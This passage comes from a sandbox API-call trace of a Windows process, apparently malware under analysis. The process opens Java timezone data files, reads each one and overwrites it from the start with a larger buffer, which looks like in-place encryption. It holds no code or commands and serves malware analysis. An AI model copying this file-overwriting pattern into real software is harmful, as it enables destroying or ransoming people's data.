lpNumberOfBytesWritten=0x2fdf2d0*=0x8d8, lpOverlapped=0x0) returned 1 [0136.781] CloseHandle (hObject=0x1cc) returned 1 [0136.781] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.783] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.783] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x139 [0136.783] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.783] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.783] ReleaseMutex (hMutex=0x168) returned 1 [0136.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Freetown", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Freetown", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Freetown", lpUsedDefaultChar=0x0) returned 8 [0136.783] ReadFile (in: hFile=0x1cc, lpBuffer=0x268af88, nNumberOfBytesToRead=0x139, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x268af88*, lpNumberOfBytesRead=0x2fdf2bc*=0x139, lpOverlapped=0x0) returned 1 [0136.784] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.784] WriteFile (in: hFile=0x1cc, lpBuffer=0x2896ef8*, nNumberOfBytesToWrite=0x6c1, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2896ef8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6c1, lpOverlapped=0x0) returned 1 [0136.785] CloseHandle (hObject=0x1cc) returned 1 [0136.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.786] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.786] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1b [0136.787] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.787] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.787] ReleaseMutex (hMutex=0x168) returned 1 [0136.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kinshasa", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kinshasa", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kinshasa", lpUsedDefaultChar=0x0) returned 8 [0136.787] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1b, lpOverlapped=0x0) returned 1 [0136.788] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.788] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0136.788] CloseHandle (hObject=0x1cc) returned 1 [0136.788] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.789] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.789] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0136.789] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.789] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.790] ReleaseMutex (hMutex=0x168) returned 1 [0136.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maputo", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maputo", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Maputo", lpUsedDefaultChar=0x0) returned 6 [0136.790] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0136.791] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.791] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0136.791] CloseHandle (hObject=0x1cc) returned 1 [0136.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.792] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.792] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x55 [0136.792] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.792] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.792] ReleaseMutex (hMutex=0x168) returned 1 [0136.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nouakchott", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0136.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nouakchott", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nouakchott", lpUsedDefaultChar=0x0) returned 10 [0136.792] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbaea8, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbaea8*, lpNumberOfBytesRead=0x2fdf2bc*=0x55, lpOverlapped=0x0) returned 1 [0136.793] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.794] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0136.794] CloseHandle (hObject=0x1cc) returned 1 [0136.794] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.805] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.806] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4c8 [0136.806] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.806] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.806] ReleaseMutex (hMutex=0x168) returned 1 [0136.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Anchorage", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Anchorage", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Anchorage", lpUsedDefaultChar=0x0) returned 9 [0136.806] ReadFile (in: hFile=0x1cc, lpBuffer=0x2890d98, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2890d98*, lpNumberOfBytesRead=0x2fdf2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0136.900] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.900] WriteFile (in: hFile=0x1cc, lpBuffer=0x25adba8*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25adba8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xa50, lpOverlapped=0x0) returned 1 [0136.900] CloseHandle (hObject=0x1cc) returned 1 [0136.901] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.902] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.902] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x22d [0136.902] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.902] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.902] ReleaseMutex (hMutex=0x168) returned 1 [0136.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="La_Rioja", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="La_Rioja", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="La_Rioja", lpUsedDefaultChar=0x0) returned 8 [0136.902] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x22d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2fdf2bc*=0x22d, lpOverlapped=0x0) returned 1 [0136.904] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.904] WriteFile (in: hFile=0x1cc, lpBuffer=0x2890998*, nNumberOfBytesToWrite=0x7b5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890998*, lpNumberOfBytesWritten=0x2fdf2d0*=0x7b5, lpOverlapped=0x0) returned 1 [0136.904] CloseHandle (hObject=0x1cc) returned 1 [0136.904] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\aruba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.905] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.905] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4d [0136.906] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.906] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.906] ReleaseMutex (hMutex=0x168) returned 1 [0136.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aruba", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aruba", cchWideChar=5, lpMultiByteStr=0x1f7acfc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aruba", lpUsedDefaultChar=0x0) returned 5 [0136.906] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fd68, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd68*, lpNumberOfBytesRead=0x2fdf2bc*=0x4d, lpOverlapped=0x0) returned 1 [0136.907] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.908] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0136.908] CloseHandle (hObject=0x1cc) returned 1 [0136.908] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.909] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.909] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5d [0136.909] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.909] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.910] ReleaseMutex (hMutex=0x168) returned 1 [0136.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blanc-Sablon", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blanc-Sablon", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blanc-Sablon", lpUsedDefaultChar=0x0) returned 12 [0136.910] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f560e8, nNumberOfBytesToRead=0x5d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f560e8*, lpNumberOfBytesRead=0x2fdf2bc*=0x5d, lpOverlapped=0x0) returned 1 [0136.911] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.911] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5e5, lpOverlapped=0x0) returned 1 [0136.911] CloseHandle (hObject=0x1cc) returned 1 [0136.912] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.913] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.913] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4d [0136.913] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.913] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.914] ReleaseMutex (hMutex=0x168) returned 1 [0136.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cayenne", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cayenne", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cayenne", lpUsedDefaultChar=0x0) returned 7 [0136.914] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fd68, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd68*, lpNumberOfBytesRead=0x2fdf2bc*=0x4d, lpOverlapped=0x0) returned 1 [0136.915] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.915] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0136.915] CloseHandle (hObject=0x1cc) returned 1 [0136.916] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.917] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.917] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x155 [0136.917] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.917] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.917] ReleaseMutex (hMutex=0x168) returned 1 [0136.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Danmarkshavn", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Danmarkshavn", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Danmarkshavn", lpUsedDefaultChar=0x0) returned 12 [0136.918] ReadFile (in: hFile=0x1cc, lpBuffer=0x26a7768, nNumberOfBytesToRead=0x155, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a7768*, lpNumberOfBytesRead=0x2fdf2bc*=0x155, lpOverlapped=0x0) returned 1 [0136.919] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.919] WriteFile (in: hFile=0x1cc, lpBuffer=0x2890998*, nNumberOfBytesToWrite=0x6dd, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890998*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6dd, lpOverlapped=0x0) returned 1 [0136.919] CloseHandle (hObject=0x1cc) returned 1 [0136.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.920] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.921] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x69 [0136.921] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.921] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.921] ReleaseMutex (hMutex=0x168) returned 1 [0136.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="El_Salvador", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="El_Salvador", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="El_Salvador", lpUsedDefaultChar=0x0) returned 11 [0136.921] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eb8c70, 